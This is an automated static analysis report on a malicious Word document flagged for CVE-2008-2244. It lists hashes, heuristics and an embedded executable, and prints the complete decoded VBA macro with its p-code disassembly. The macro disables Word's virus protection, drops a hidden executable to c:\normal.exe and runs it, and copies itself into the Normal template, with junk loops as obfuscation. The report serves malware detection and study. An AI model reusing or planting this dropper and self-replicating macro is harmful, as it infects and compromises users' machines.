Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8202390305aeb147…

MALICIOUS

Office (OLE)

85.5 KB Created: 2000-06-23 21:52:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 5e0e40b876949f3b0158738851dbdffe SHA-1: bf7bd975517bb10f213fd3ab37a6744cd42b5fc0 SHA-256: 8202390305aeb14776467e3ab4a897d9c9799e9f52388eb47b4ad9de5e74b866
480 Risk Score

Malware Insights

MITRE ATT&CK
T1204.002 Malicious File T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample is a malicious Microsoft Word document that exploits CVE-2008-2244, a vulnerability in Word's record-parsing payload. It contains VBA macros that call the Shell() function and references WinExec, CreateProcess, LoadLibrary, and GetProcAddress APIs, indicating it likely executes a payload. An embedded PE executable was also detected, and the VBA script attempts to save it to 'c:\normal.exe'.

Heuristics 11

  • CVE-2008-2244 — Microsoft Word record-parsing payload critical CVE likely CVE_2008_2244
    Word OLE document has normal small WordDocument/table streams, a large unallocated OLE slack region, and an executable or resolver shellcode payload in that slack. This is the static shape of the MS08-042 Word record-parsing exploit family tracked as CVE-2008-2244.
  • ClamAV: Doc.Trojan.Marker-14 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Marker-14
  • Embedded PE executable critical OLE_EMBEDDED_EXE
    MZ/PE header found inside document — possible embedded executable
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
             CloseFile dh
              Shell "c:\normal.exe", vbHide
  • Reference to WinExec API high SC_STR_WINEXEC
    Reference to WinExec API
  • Reference to CreateProcess API high SC_STR_CREATEPROCESS
    Reference to CreateProcess API
  • Reference to LoadLibrary API high SC_STR_LOADLIBRARY
    Reference to LoadLibrary API
  • Reference to GetProcAddress API high SC_STR_GETPROCADDRESS
    Reference to GetProcAddress API
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 87,552 bytes but its declared streams total only 32,421 bytes — 55,131 bytes (63%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 21371 bytes
SHA-256: a19a345df0d5958b5a8c34c7ceb99c73774f9f2b95bd722b3e4ac2973ea53bf6
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Declare Function SetEndOfFile Lib "kernel32" Alias "setendoffile" (ByVal h As Long) As Boolean
Private Declare Function OpenFile Lib "kernel32" Alias "_lopen" (ByVal s As String, ByVal mode As Long) As Long
Private Declare Function CreateFile Lib "kernel32" Alias "_lcreat" (ByVal s As String, ByVal attr As Long) As Long
Private Declare Function GlobalAlloc Lib "kernel32" (ByVal fl As Long, ByVal n As Long) As Long
Private Declare Sub CopyFileA Lib "kernel32" (ByVal src As String, ByVal dst As String, ByVal mode As Long)
Private Declare Function SeekFile Lib "kernel32" Alias "_llseek" (ByVal h As Long, ByVal ofs As Long, ByVal fw As Long) As Long
Private Declare Sub ReadFile Lib "kernel32" Alias "_lread" (ByVal h As Long, ByVal ptr As Long, ByVal n As Long)
Private Declare Sub WriteFile Lib "kernel32" Alias "_lwrite" (ByVal h As Long, ByVal ptr As Long, ByVal n As Long)
Private Declare Sub CloseFile Lib "kernel32" Alias "_lclose" (ByVal h As Long)

Private Sub Document_Close()

On Error Resume Next
Options.VirusProtection = False
Const ker = "Miсrоsоft Оfficе"

Dim SaveDocument, SaveNormalTemplate, DocumentInfected, NormalTemplateInfected As Boolean
Dim dad, dnt As Object
Dim OurCode, UserAddress, LogData, LogFile As String
Dim dc As String, xe As String
Dim dh As Long, dp As Long, ss As Long
Dim x_z, z_y, z_z, z_a, z_b As Long
For x_z = 1 To 30
 z_y = 2
 z_z = 6
 z_a = 9
 z_b = 1
Next x_z
xe = "c:\normal.exe"

For x_z = 1 To 30
 z_y = 2
 z_z = 6
 z_a = 9
 z_b = 1
Next x_z

Set dad = ActiveDocument.VBProject.VBComponents.Item(1)
For x_z = 1 To 30
 z_y = 2
 z_z = 6
 z_a = 9
 z_b = 1
Next x_z
Set dnt = NormalTemplate.VBProject.VBComponents.Item(1)
For x_z = 1 To 30
 z_y = 2
 z_z = 6
 z_a = 9
 z_b = 1
Next x_z
DocumentInfected = dad.CodeModule.Find(ker, 1, 1, 10000, 10000)
For x_z = 1 To 30
 z_y = 2
 z_z = 6
 z_a = 9
 z_b = 1
Next x_z
NormalTemplateInfected = dnt.CodeModule.Find(ker, 1, 1, 10000, 10000)
For x_z = 1 To 30
 z_y = 2
 z_z = 6
 z_a = 9
 z_b = 1
Next x_z
dc = ActiveDocument.Name
For x_z = 1 To 30
 z_y = 2
 z_z = 6
 z_a = 9
 z_b = 1
Next x_z

 dp = GlobalAlloc(0, 50698)
 dh = OpenFile(dc, 0)
For x_z = 1 To 30
 z_y = 2
 z_z = 6
 z_a = 9
 z_b = 1
Next x_z
 
 If SetEndOfFile(dh) Then
        ss = SeekFile(dh, -50688, 2)
        ReadFile dh, dp, 50688
        CloseFile dh
For x_z = 1 To 30
 z_y = 2
 z_z = 6
 z_a = 9
 z_b = 1
Next x_z
        
         dh = CreateFile(xe, 0)
         WriteFile dh, dp, 50698
         CloseFile dh
          Shell "c:\normal.exe", vbHide
           
        End If
        

For x_z = 1 To 30
 z_y = 2
 z_z = 6
 z_a = 9
 z_b = 1
Next x_z

If (DocumentInfected = True Xor NormalTemplateInfected = True) And _
   (ActiveDocument.SaveFormat = wdFormatDocument Or _
   ActiveDocument.SaveFormat = wdFormatTemplate) Then
 
   
For x_z = 1 To 30
 z_y = 2
 z_z = 6
 z_a = 9
 z_b = 1
Next x_z

   If DocumentInfected = True Then
      SaveNormalTemplate = NormalTemplate.Saved
      OurCode = dad.CodeModule.Lines(1, dad.CodeModule.CountOfLines)

For x_z = 1 To 30
 z_y = 2
 z_z = 6
 z_a = 9
 z_b = 1
Next x_z

      For i = 1 To Len(Application.UserAddress)
      If Mid(Application.UserAddress, i, 1) <> Chr(13) Then
        If Mid(Application.UserAddress, i, 1) <> Chr(10) Then
          For x_z = 1 To 30
 z_y = 2
 z_z = 6
 z_a = 9
 z_b = 1
Next x_z
          UserAddress = UserAddress & Mid(Application.UserAddress, i, 1)
        End If
      Else
        UserAddress = UserAddress & Chr(13) & "' "
      End If
     Next i

For x_z = 1 To 30
 z_y = 2
 z_z = 6
 z_a = 9
 z_b = 1
Next x_z
  
    
    dnt.CodeModule.DeleteLines 1, dnt.CodeModule.CountOfLines
For x_z = 1 To 30
 z_y = 2
 z_z = 6
 z_a = 9
 z_b = 1
Next x_z
    dnt.CodeModule.AddFromString OurCode
 For x_z = 1 To 30
 z_y = 2
 z_z = 6
 z_a = 9
 z_b = 1
Next x_z
    If SaveNormalTemplate = True Then NormalTemplate.Save
For x_z = 1 To 30
 z_y = 2
 z_z = 6
 z_a = 9
 z_b = 1
Next x_z
    
  End If


  If NormalTemplateInfected = True And _
     (Mid(ActiveDocument.FullName, 2, 1) = ":" Or _
     ActiveDocument.Saved = False) Then
For x_z = 1 To 30
 z_y = 2
 z_z = 6
 z_a = 9
 z_b = 1
Next x_z
    SaveDocument = ActiveDocument.Saved
For x_z = 1 To 30
 z_y = 2
 z_z = 6
 z_a = 9
 z_b = 1
Next x_z
    
    OurCode = dnt.CodeModule.Lines(1, dnt.CodeModule.CountOfLines)
For x_z = 1 To 30
 z_y = 2
 z_z = 6
 z_a = 9
 z_b = 1
Next x_z
    dad.CodeModule.DeleteLines 1, dad.CodeModule.CountOfLines
For x_z = 1 To 30
 z_y = 2
 z_z = 6
 z_a = 9
 z_b = 1
Next x_z
    dad.CodeModule.AddFromString OurCode
For x_z = 1 To 30
 z_y = 2
 z_z = 6
 z_a = 9
 z_b = 1
Next x_z
    
    If SaveDocument = True Then ActiveDocument.Save
For x_z = 1 To 30
 z_y = 2
 z_z = 6
 z_a = 9
 z_b = 1
Next x_z
      
  End If
  
For x_z = 1 To 30
 z_y = 2
 z_z = 6
 z_a = 9
 z_b = 1
Next x_z
    
End If
For x_z = 1 To 30
 z_y = 2
 z_z = 6
 z_a = 9
 z_b = 1
Next x_z

End Sub







' Processing file: /tmp/qstore_uninwalr
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 10920 bytes
' Line #0:
' 	FuncDefn (Private Declare Function SetEndOfFile Lib "kernel32" (ByVal h As Long) As Boolean)
' Line #1:
' 	FuncDefn (Private Declare Function OpenFile Lib "kernel32" (ByVal s As String, ByVal mode As Long) As Long)
' Line #2:
' 	FuncDefn (Private Declare Function CreateFile Lib "kernel32" (ByVal s As String, ByVal attr As Long) As Long)
' Line #3:
' 	FuncDefn (Private Declare Function GlobalAlloc Lib "kernel32" (ByVal fl As Long, ByVal n As Long) As Long)
' Line #4:
' 	FuncDefn (Private Declare Sub CopyFileA Lib "kernel32" (ByVal src As String, ByVal dst As String, ByVal mode As Long))
' Line #5:
' 	FuncDefn (Private Declare Function SeekFile Lib "kernel32" (ByVal h As Long, ByVal ofs As Long, ByVal fw As Long) As Long)
' Line #6:
' 	FuncDefn (Private Declare Sub ReadFile Lib "kernel32" (ByVal h As Long, ByVal ptr As Long, ByVal n As Long))
' Line #7:
' 	FuncDefn (Private Declare Sub WriteFile Lib "kernel32" (ByVal h As Long, ByVal ptr As Long, ByVal n As Long))
' Line #8:
' 	FuncDefn (Private Declare Sub CloseFile Lib "kernel32" (ByVal h As Long))
' Line #9:
' Line #10:
' 	FuncDefn (Private Sub Document_Close())
' Line #11:
' Line #12:
' 	OnError (Resume Next) 
' Line #13:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #14:
' 	Dim (Const) 
' 	LitStr 0x0010 "Miсrоsоft Оfficе"
' 	VarDefn ker
' Line #15:
' Line #16:
' 	Dim 
' 	VarDefn SaveDocument
' 	VarDefn SaveNormalTemplate
' 	VarDefn DocumentInfected
' 	VarDefn NormalTemplateInfected (As Boolean)
' Line #17:
' 	Dim 
' 	VarDefn dad
' 	VarDefn dnt (As Object)
' Line #18:
' 	Dim 
' 	VarDefn OurCode
' 	VarDefn UserAddress
' 	VarDefn LogData
' 	VarDefn LogFile (As String)
' Line #19:
' 	Dim 
' 	VarDefn dc (As String)
' 	VarDefn xe (As String)
' Line #20:
' 	Dim 
' 	VarDefn dh (As Long)
' 	VarDefn dp (As Long)
' 	VarDefn ss (As Long)
' Line #21:
' 	Dim 
' 	VarDefn x_z
' 	VarDefn z_y
' 	VarDefn z_z
' 	VarDefn z_a
' 	VarDefn z_b (As Long)
' Line #22:
' 	StartForVariable 
' 	Ld x_z 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	LitDI2 0x001E 
' 	For 
' Line #23:
' 	LitDI2 0x0002 
' 	St z_y 
' Line #24:
' 	LitDI2 0x0006 
' 	St z_z 
' Line #25:
' 	LitDI2 0x0009 
' 	St z_a 
' Line #26:
' 	LitDI2 0x0001 
' 	St z_b 
' Line #27:
' 	StartForVariable 
' 	Ld x_z 
' 	EndForVariable 
' 	NextVar 
' Line #28:
' 	LitStr 0x000D "c:\normal.exe"
' 	St xe 
' Line #29:
' Line #30:
' 	StartForVariable 
' 	Ld x_z 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	LitDI2 0x001E 
' 	For 
' Line #31:
' 	LitDI2 0x0002 
' 	St z_y 
' Line #32:
' 	LitDI2 0x0006 
' 	St z_z 
' Line #33:
' 	LitDI2 0x0009 
' 	St z_a 
' Line #34:
' 	LitDI2 0x0001 
' 	St z_b 
' Line #35:
' 	StartForVariable 
' 	Ld x_z 
' 	EndForVariable 
' 	NextVar 
' Line #36:
' Line #37:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	Set dad 
' Line #38:
' 	StartForVariable 
' 	Ld x_z 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	LitDI2 0x001E 
' 	For 
' Line #39:
' 	LitDI2 0x0002 
' 	St z_y 
' Line #40:
' 	LitDI2 0x0006 
' 	St z_z 
' Line #41:
' 	LitDI2 0x0009 
' 	St z_a 
' Line #42:
' 	LitDI2 0x0001 
' 	St z_b 
' Line #43:
' 	StartForVariable 
' 	Ld x_z 
' 	EndForVariable 
' 	NextVar 
' Line #44:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	Set dnt 
' Line #45:
' 	StartForVariable 
' 	Ld x_z 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	LitDI2 0x001E 
' 	For 
' Line #46:
' 	LitDI2 0x0002 
' 	St z_y 
' Line #47:
' 	LitDI2 0x0006 
' 	St z_z 
' Line #48:
' 	LitDI2 0x0009 
' 	St z_a 
' Line #49:
' 	LitDI2 0x0001 
' 	St z_b 
' Line #50:
' 	StartForVariable 
' 	Ld x_z 
' 	EndForVariable 
' 	NextVar 
' Line #51:
' 	Ld ker 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	LitDI2 0x2710 
' 	LitDI2 0x2710 
' 	Ld dad 
' 	MemLd CodeModule 
' 	ArgsMemLd Find 0x0005 
' 	St DocumentInfected 
' Line #52:
' 	StartForVariable 
' 	Ld x_z 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	LitDI2 0x001E 
' 	For 
' Line #53:
' 	LitDI2 0x0002 
' 	St z_y 
' Line #54:
' 	LitDI2 0x0006 
' 	St z_z 
' Line #55:
' 	LitDI2 0x0009 
' 	St z_a 
' Line #56:
' 	LitDI2 0x0001 
' 	St z_b 
' Line #57:
' 	StartForVariable 
' 	Ld x_z 
' 	EndForVariable 
' 	NextVar 
' Line #58:
' 	Ld ker 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	LitDI2 0x2710 
' 	LitDI2 0x2710 
' 	Ld dnt 
' 	MemLd CodeModule 
' 	ArgsMemLd Find 0x0005 
' 	St NormalTemplateInfected 
' Line #59:
' 	StartForVariable 
' 	Ld x_z 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	LitDI2 0x001E 
' 	For 
' Line #60:
' 	LitDI2 0x0002 
' 	St z_y 
' Line #61:
' 	LitDI2 0x0006 
' 	St z_z 
' Line #62:
' 	LitDI2 0x0009 
' 	St z_a 
' Line #63:
' 	LitDI2 0x0001 
' 	St z_b 
' Line #64:
' 	StartForVariable 
' 	Ld x_z 
' 	EndForVariable 
' 	NextVar 
' Line #65:
' 	Ld ActiveDocument 
' 	MemLd New 
' 	St dc 
' Line #66:
' 	StartForVariable 
' 	Ld x_z 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	LitDI2 0x001E 
' 	For 
' Line #67:
' 	LitDI2 0x0002 
' 	St z_y 
' Line #68:
' 	LitDI2 0x0006 
' 	St z_z 
' Line #69:
' 	LitDI2 0x0009 
' 	St z_a 
' Line #70:
' 	LitDI2 0x0001 
' 	St z_b 
' Line #71:
' 	StartForVariable 
' 	Ld x_z 
' 	EndForVariable 
' 	NextVar 
' Line #72:
' Line #73:
' 	LitDI2 0x0000 
' 	LitDI4 0xC60A 0x0000 
' 	ArgsLd GlobalAlloc 0x0002 
' 	St dp 
' Line #74:
' 	Ld dc 
' 	LitDI2 0x0000 
' 	ArgsLd OpenFile 0x0002 
' 	St dh 
' Line #75:
' 	StartForVariable 
' 	Ld x_z 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	LitDI2 0x001E 
' 	For 
' Line #76:
' 	LitDI2 0x0002 
' 	St z_y 
' Line #77:
' 	LitDI2 0x0006 
' 	St z_z 
' Line #78:
' 	LitDI2 0x0009 
' 	St z_a 
' Line #79:
' 	LitDI2 0x0001 
' 	St z_b 
' Line #80:
' 	StartForVariable 
' 	Ld x_z 
' 	EndForVariable 
' 	NextVar 
' Line #81:
' Line #82:
' 	Ld dh 
' 	ArgsLd SetEndOfFile 0x0001 
' 	IfBlock 
' Line #83:
' 	Ld dh 
' 	LitDI4 0xC600 0x0000 
' 	UMi 
' 	LitDI2 0x0002 
' 	ArgsLd SeekFile 0x0003 
' 	St ss 
' Line #84:
' 	Ld dh 
' 	Ld dp 
' 	LitDI4 0xC600 0x0000 
' 	ArgsCall ReadFile 0x0003 
' Line #85:
' 	Ld dh 
' 	ArgsCall CloseFile 0x0001 
' Line #86:
' 	StartForVariable 
' 	Ld x_z 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	LitDI2 0x001E 
' 	For 
' Line #87:
' 	LitDI2 0x0002 
' 	St z_y 
' Line #88:
' 	LitDI2 0x0006 
' 	St z_z 
' Line #89:
' 	LitDI2 0x0009 
' 	St z_a 
' Line #90:
' 	LitDI2 0x0001 
' 	St z_b 
' Line #91:
' 	StartForVariable 
' 	Ld x_z 
' 	EndForVariable 
' 	NextVar 
' Line #92:
' Line #93:
' 	Ld xe 
' 	LitDI2 0x0000 
' 	ArgsLd CreateFile 0x0002 
' 	St dh 
' Line #94:
' 	Ld dh 
' 	Ld dp 
' 	LitDI4 0xC60A 0x0000 
' 	ArgsCall WriteFile 0x0003 
' Line #95:
' 	Ld dh 
' 	ArgsCall CloseFile 0x0001 
' Line #96:
' 	LitStr 0x000D "c:\normal.exe"
' 	Ld vbHide 
' 	ArgsCall Shell 0x0002 
' Line #97:
' Line #98:
' 	EndIfBlock 
' Line #99:
' Line #100:
' Line #101:
' 	StartForVariable 
' 	Ld x_z 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	LitDI2 0x001E 
' 	For 
' Line #102:
' 	LitDI2 0x0002 
' 	St z_y 
' Line #103:
' 	LitDI2 0x0006 
' 	St z_z 
' Line #104:
' 	LitDI2 0x0009 
' 	St z_a 
' Line #105:
' 	LitDI2 0x0001 
' 	St z_b 
' Line #106:
' 	StartForVariable 
' 	Ld x_z 
' 	EndForVariable 
' 	NextVar 
' Line #107:
' Line #108:
' 	LineCont 0x0008 0B 00 03 00 12 00 03 00
' 	Ld DocumentInfected 
' 	LitVarSpecial (True)
' 	Eq 
' 	Ld NormalTemplateInfected 
' 	LitVarSpecial (True)
' 	Eq 
' 	Xor 
' 	Paren 
' 	Ld ActiveDocument 
' 	MemLd SaveFormat 
' 	Ld wdFormatDocument 
' 	Eq 
' 	Ld ActiveDocument 
' 	MemLd SaveFormat 
' 	Ld wdFormatTemplate 
' 	Eq 
' 	Or 
' 	Paren 
' 	And 
' 	IfBlock 
' Line #109:
' Line #110:
' Line #111:
' 	StartForVariable 
' 	Ld x_z 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	LitDI2 0x001E 
' 	For 
' Line #112:
' 	LitDI2 0x0002 
' 	St z_y 
' Line #113:
' 	LitDI2 0x0006 
' 	St z_z 
' Line #114:
' 	LitDI2 0x0009 
' 	St z_a 
' Line #115:
' 	LitDI2 0x0001 
' 	St z_b 
' Line #116:
' 	StartForVariable 
' 	Ld x_z 
' 	EndForVariable 
' 	NextVar 
' Line #117:
' Line #118:
' 	Ld DocumentInfected 
' 	LitVarSpecial (True)
' 	Eq 
' 	IfBlock 
' Line #119:
' 	Ld NormalTemplate 
' 	MemLd Saved 
' 	St SaveNormalTemplate 
' Line #120:
' 	LitDI2 0x0001 
' 	Ld dad 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	Ld dad 
' 	MemLd CodeModule 
' 	ArgsMemLd Lines 0x0002 
' 	St OurCode 
' Line #121:
' Line #122:
' 	StartForVariable 
' 	Ld x_z 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	LitDI2 0x001E 
' 	For 
' Line #123:
' 	LitDI2 0x0002 
' 	St z_y 
' Line #124:
' 	LitDI2 0x0006 
' 	St z_z 
' Line #125:
' 	LitDI2 0x0009 
' 	St z_a 
' Line #126:
' 	LitDI2 0x0001 
' 	St z_b 
' Line #127:
' 	StartForVariable 
' 	Ld x_z 
' 	EndForVariable 
' 	NextVar 
' Line #128:
' Line #129:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld Application 
' 	MemLd UserAddress 
' 	FnLen 
' 	For 
' Line #130:
' 	Ld Application 
' 	MemLd UserAddress 
' 	Ld i 
' 	LitDI2 0x0001 
' 	ArgsLd Mid$ 0x0003 
' 	LitDI2 0x000D 
' 	ArgsLd Chr 0x0001 
' 	Ne 
' 	IfBlock 
' Line #131:
' 	Ld Application 
' 	MemLd UserAddress 
' 	Ld i 
' 	LitDI2 0x0001 
' 	ArgsLd Mid$ 0x0003 
' 	LitDI2 0x000A 
' 	ArgsLd Chr 0x0001 
' 	Ne 
' 	IfBlock 
' Line #132:
' 	StartForVariable 
' 	Ld x_z 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	LitDI2 0x001E 
' 	For 
' Line #133:
' 	LitDI2 0x0002 
' 	St z_y 
' Line #134:
' 	LitDI2 0x0006 
' 	St z_z 
' Line #135:
' 	LitDI2 0x0009 
' 	St z_a 
' Line #136:
' 	LitDI2 0x0001 
' 	St z_b 
' Line #137:
' 	StartForVariable 
' 	Ld x_z 
' 	EndForVariable 
' 	NextVar 
' Line #138:
' 	Ld UserAddress 
' 	Ld Application 
' 	MemLd UserAddress 
' 	Ld i 
' 	LitDI2 0x0001 
' 	ArgsLd Mid$ 0x0003 
' 	Concat 
' 	St UserAddress 
' Line #139:
' 	EndIfBlock 
' Line #140:
' 	ElseBlock 
' Line #141:
' 	Ld UserAddress 
' 	LitDI2 0x000D 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitStr 0x0002 "' "
' 	Concat 
' 	St UserAddress 
' Line #142:
' 	EndIfBlock 
' Line #143:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	NextVar 
' Line #144:
' Line #145:
' 	StartForVariable 
' 	Ld x_z 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	LitDI2 0x001E 
' 	For 
' Line #146:
' 	LitDI2 0x0002 
' 	St z_y 
' Line #147:
' 	LitDI2 0x0006 
' 	St z_z 
' Line #148:
' 	LitDI2 0x0009 
' 	St z_a 
' Line #149:
' 	LitDI2 0x0001 
' 	St z_b 
' Line #150:
' 	StartForVariable 
' 	Ld x_z 
' 	EndForVariable 
' 	NextVar 
' Line #151:
' Line #152:
' Line #153:
' 	LitDI2 0x0001 
' 	Ld dnt 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	Ld dnt 
' 	MemLd CodeModule 
' 	ArgsMemCall DeleteLines 0x0002 
' Line #154:
' 	StartForVariable 
' 	Ld x_z 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	LitDI2 0x001E 
' 	For 
' Line #155:
' 	LitDI2 0x0002 
' 	St z_y 
' Line #156:
' 	LitDI2 0x0006 
' 	St z_z 
' Line #157:
' 	LitDI2 0x0009 
' 	St z_a 
' Line #158:
' 	LitDI2 0x0001 
' 	St z_b 
' Line #159:
' 	StartForVariable 
' 	Ld x_z 
' 	EndForVariable 
' 	NextVar 
' Line #160:
' 	Ld OurCode 
' 	Ld dnt 
' 	MemLd CodeModule 
' 	ArgsMemCall AddFromString 0x0001 
' Line #161:
' 	StartForVariable 
' 	Ld x_z 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	LitDI2 0x001E 
' 	For 
' Line #162:
' 	LitDI2 0x0002 
' 	St z_y 
' Line #163:
' 	LitDI2 0x0006 
' 	St z_z 
' Line #164:
' 	LitDI2 0x0009 
' 	St z_a 
' Line #165:
' 	LitDI2 0x0001 
' 	St z_b 
' Line #166:
' 	StartForVariable 
' 	Ld x_z 
' 	EndForVariable 
' 	NextVar 
' Line #167:
' 	Ld SaveNormalTemplate 
' 	LitVarSpecial (True)
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	Ld NormalTemplate 
' 	ArgsMemCall Save 0x0000 
' 	EndIf 
' Line #168:
' 	StartForVariable 
' 	Ld x_z 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	LitDI2 0x001E 
' 	For 
' Line #169:
' 	LitDI2 0x0002 
' 	St z_y 
' Line #170:
' 	LitDI2 0x0006 
' 	St z_z 
' Line #171:
' 	LitDI2 0x0009 
' 	St z_a 
' Line #172:
' 	LitDI2 0x0001 
' 	St z_b 
' Line #173:
' 	StartForVariable 
' 	Ld x_z 
' 	EndForVariable 
' 	NextVar 
' Line #174:
' Line #175:
' 	EndIfBlock 
' Line #176:
' Line #177:
' Line #178:
' 	LineCont 0x0008 05 00 05 00 13 00 05 00
' 	Ld NormalTemplateInfected 
' 	LitVarSpecial (True)
' 	Eq 
' 	Ld ActiveDocument 
' 	MemLd FullName 
' 	LitDI2 0x0002 
' 	LitDI2 0x0001 
' 	ArgsLd Mid$ 0x0003 
' 	LitStr 0x0001 ":"
' 	Eq 
' 	Ld ActiveDocument 
' 	MemLd Saved 
' 	LitVarSpecial (False)
' 	Eq 
' 	Or 
' 	Paren 
' 	And 
' 	IfBlock 
' Line #179:
' 	StartForVariable 
' 	Ld x_z 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	LitDI2 0x001E 
' 	For 
' Line #180:
' 	LitDI2 0x0002 
' 	St z_y 
' Line #181:
' 	LitDI2 0x0006 
…
embedded_office_00009000.exe embedded-pe Office MZ+PE at offset 0x9000 50688 bytes
SHA-256: fbe435be06293624b70f8a040968c9852f9841b20ecba3617a85c1c4a782ab11